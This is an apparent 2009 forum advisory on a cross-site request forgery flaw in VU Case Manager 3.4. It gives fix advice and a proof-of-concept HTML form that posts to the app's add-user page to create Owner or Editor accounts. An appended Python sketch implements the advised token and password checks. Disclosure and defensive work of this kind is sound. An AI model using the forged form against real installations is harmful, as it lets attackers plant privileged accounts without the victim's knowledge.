VU Case Manager 3.4 ~ XSRF Vuln. | Cyber-Warrior Information Technology's World
Author : Bug Researchers/CWH1RLPOOL
Date : 13.09.2009 19:56:55
< ------------------- header data start ------------------- >
#############################################################
# Application Name : VU Case Manager 3.4
# Vulnerable Type  : XSRF
# Infection        : An admin or user can be added remotely and automatically.
# Bug Fix Advice   : A session key (session token) should be added to the form, and the old password should be asked for.
# Author           : BUG RESEARCHERS//CWH1RLPOOL
#############################################################
< ------------------- header data end of ------------------- >

< -- bug code start -- >
<form name="NEWUSER" method="post" action="http://localhost/casemng/add_to_newuser.asp" onsubmit="return CheckForm()">
<table width="575" border="0" cellspacing="0" cellpadding="5" bordercolor="white">
  <tr>
    <td width="139" bgcolor="f5f5f5"> <div align="right">*User Logon Name:</div></td>
    <td width="416"> <input type="text" name="username" maxlength="20" size="20"> </td>
  </tr>
  <tr>
    <td width="139" bgcolor="f5f5f5"> <div align="right">*User password:</div></td>
    <td width="416"> <input type="password" name="userpassword" size="20" maxlength="20"> </td>
  </tr>
  <tr>
    <td colspan="2"><strong><font color="#990000" size="1" face="Verdana, Arial, Helvetica, sans-serif">select one of the following:</font></strong></td>
  </tr>
  <tr>
    <td width="139" bgcolor="f5f5f5"> <div align="right">*User Full Name:</div></td>
    <td width="416"> <p> <input type="text" name="userfullname" size="30" maxlength="50"> ex.: John Smith</p></td>
  </tr>
  <tr>
    <td bgcolor="f5f5f5"> </td>
    <td><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong>Note: the name will always appear in the list of staff to be selected for the case assignment</strong></font></td>
  </tr>
  <tr>
    <td bgcolor="f5f5f5"><div align="right">*Assign Level:</div></td>
    <td> <select name="userlevel">
      <option value="">--select Role--</option>
      <option value="3">Owner</option>
      <option value="2">Editor</option>
    </select></td>
  </tr>
  <tr>
    <td bgcolor="f5f5f5"> </td>
    <td><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong>Owner = full access (manager)<br> Editor = full access but limited to deletion (staff)</strong></font></td>
  </tr>
  <tr>
    <td width="139"> <div align="left"><font color="#FF0000"><strong>OR</strong></font></div></td>
    <td width="416"><font size="1" face="Verdana, Arial, Helvetica, sans-serif"> </font></td>
  </tr>
  <tr>
    <td bgcolor="f5f5f5"><div align="right">*Client Name:</div></td>
    <td><input type="text" name="client" size="40" maxlength="50"> <!--onBlur=return CheckLevel();--> ex.: Microsoft Corp.</td>
  </tr>
  <tr>
    <td bgcolor="f5f5f5"> </td>
    <td><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong>Note: client’s name will appear in the list of companies while entering inventory items</strong></font></td>
  </tr>
</table>
<p> <input type="submit" name="Submit" value="Submit"> <input type="reset" name="Reset" value="Reset"> </p>
</form>
< -- bug code end of -- >
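
The fix advice above (a session token in the form plus a password prompt), sketched as an added example; it is not code from the advisory or from VU Case Manager. It is written in Python rather than the application's ASP, and `handle_add_user`, the `csrf_token` and `current_password` field names, and reading "old password" as the logged-in user's current password are assumptions.

```python
import hashlib
import hmac
import secrets

# Constructed per-process key; a real deployment loads it from protected config.
SERVER_KEY = secrets.token_bytes(32)


def _mac(session_id, nonce):
    msg = f"{session_id}:{nonce}".encode()
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()


def issue_token(session_id):
    """Value for a hidden form field, bound to the session that rendered the form."""
    nonce = secrets.token_hex(16)
    return f"{nonce}.{_mac(session_id, nonce)}"


def token_is_valid(session_id, token):
    """True only if the token was issued for this session."""
    if not token or token.count(".") != 1:
        return False
    nonce, mac = token.split(".")
    return hmac.compare_digest(mac.encode(), _mac(session_id, nonce).encode())


def handle_add_user(session, form, check_password):
    """Hypothetical stand-in for the add_to_newuser handler with both fixes applied."""
    # Under the same-origin policy a cross-site form cannot read the token.
    if not token_is_valid(session["id"], form.get("csrf_token")):
        return 403, "missing or invalid session token"
    # Second part of the advice: the logged-in user re-enters their password.
    if not check_password(session["user"], form.get("current_password", "")):
        return 403, "current password required"
    if form.get("userlevel") not in {"2", "3"}:  # Editor / Owner, as in the form
        return 400, "invalid role"
    return 200, f"user {form.get('username')} created"


if __name__ == "__main__":
    # Constructed session and request data for demonstration.
    session = {"id": "sess-A", "user": "owner1"}
    check = lambda user, pw: (user, pw) == ("owner1", "constructed-password")
    forged = {"username": "newacct", "userpassword": "x", "userlevel": "3"}
    print(handle_add_user(session, forged, check))
    legit = dict(forged, csrf_token=issue_token("sess-A"),
                 current_password="constructed-password")
    print(handle_add_user(session, legit, check))
```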